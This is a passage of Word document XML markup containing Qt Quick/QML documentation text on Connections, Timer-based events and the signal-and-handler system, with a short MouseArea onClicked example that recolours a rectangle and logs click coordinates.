        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By declaring a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2681" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance, the client can dynamically cause signals emitted by one object to trigger methods of another object, and can modify the connection target when required (or when it becomes available).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="002230B8" w:rsidRDefault="00BB63D0" w:rsidP="002230B8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2397" w:name="timer-based-events"/>
      <w:bookmarkStart w:id="2398" w:name="_Toc483001046"/>
      <w:bookmarkStart w:id="2399" w:name="_Toc483004035"/>
      <w:bookmarkStart w:id="2400" w:name="_Toc483604387"/>
      <w:bookmarkStart w:id="2401" w:name="_Toc483605607"/>
      <w:bookmarkEnd w:id="2397"/>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Timer-Based Events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2398"/>
      <w:bookmarkEnd w:id="2399"/>
      <w:bookmarkEnd w:id="2400"/>
      <w:bookmarkEnd w:id="2401"/>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00C10CB8" w:rsidRDefault="00BB63D0" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Another common use-case is to </w:t>
      </w:r>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tri</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gger functionality some specified period of time after a particular event occurs</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These sort of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>timer-based triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are supported in Qt Quick through the</w:t>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2682" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Timer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Both </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">single-shot </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">recurring </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>timers are supported.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="002230B8" w:rsidRDefault="00D77D11" w:rsidP="002230B8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2402" w:name="_Toc483001053"/>
      <w:bookmarkStart w:id="2403" w:name="_Toc483004042"/>
      <w:bookmarkStart w:id="2404" w:name="_Toc483604388"/>
      <w:bookmarkStart w:id="2405" w:name="_Toc483605608"/>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signal and Handler Event System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2402"/>
      <w:bookmarkEnd w:id="2403"/>
      <w:bookmarkEnd w:id="2404"/>
      <w:bookmarkEnd w:id="2405"/>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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Application and user interface components need to communicate with each other</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example, a button needs to know that the user has clicked on it. The button may change colors to indicate its state or perform some logic. As well, application needs to know whether the user is clicking the button. The application may need to relay this clicking event to other applications.</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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML has a signal and handler mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, where </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> is the event</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the signal is responded to through a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal is emitted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>corresponding signal handler is invoked</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Placing logic such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scripts or other operations in the handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows the component to respond to the event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00490E7E" w:rsidRDefault="00D77D11" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2406" w:name="qml-signals-and-handlers"/>
      <w:bookmarkStart w:id="2407" w:name="receiving-signals-with-signal-handlers"/>
      <w:bookmarkStart w:id="2408" w:name="_Toc483001054"/>
      <w:bookmarkStart w:id="2409" w:name="_Toc483004043"/>
      <w:bookmarkStart w:id="2410" w:name="_Toc483604389"/>
      <w:bookmarkStart w:id="2411" w:name="_Toc483605609"/>
      <w:bookmarkEnd w:id="2406"/>
      <w:bookmarkEnd w:id="2407"/>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Receiving Signals with Signal Handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2408"/>
      <w:bookmarkEnd w:id="2409"/>
      <w:bookmarkEnd w:id="2410"/>
      <w:bookmarkEnd w:id="2411"/>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 xml:space="preserve">To receive a notification when a particular signal is emitted for a particular object, the object definition should </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declare a signal handler named</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;Signal&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Signal&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is the name of the signal, with the first letter capitalized. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sign</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>al handler should contain the JavaScript code to be executed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the signal handler is invoked.</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 xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2683" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> type from the QtQuick module has a clicked signal that is emitted whenever the mouse is clicked within the area. Since the signal name is clicked, the signal handler for receiving this signal should be named onClicked. In the example below, whenever the mouse area is clicked, the onClicked handler is invoked, applying a random color to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2684" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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import QtQuick 2.0</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Rectangle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id: rect</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    width: 100; height: 100</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MouseArea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anchors.fill: parent</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onClicked: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rect.color = Qt.rgba(Math.random(), Math.random(), Math.random(), 1);</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Looking at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2685" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> documentation, you can see the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2686" w:anchor="clicked-signal" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>clicked</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> signal is emitted with a parameter named mouse which is a </w:t>
      </w:r>
      <w:hyperlink r:id="rId2687" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseEvent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> object that contains further details about the mouse click event. This name can be referred to in our onClicked handler to access this parameter. For example, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2688" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseEvent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> type has x and y coordinates that allows us to print out the exact location where the mouse was clicked:</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import QtQuick 2.0</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Rectangle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id: rect</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width: 100; height: 100</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MouseArea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anchors.fill: parent</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onClicked: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rect.color = Qt.rgba(Math.random(), Math.random(), Math.random(), 1);</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 access 'mouse' parameter</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console.log("Clicked mouse at", mouse.x, mouse.y)</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00490E7E" w:rsidRDefault="00D77D11" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2412" w:name="property-change-signal-handlers"/>
      <w:bookmarkStart w:id="2413" w:name="_Toc483001055"/>
      <w:bookmarkStart w:id="2414" w:name="_Toc483004044"/>
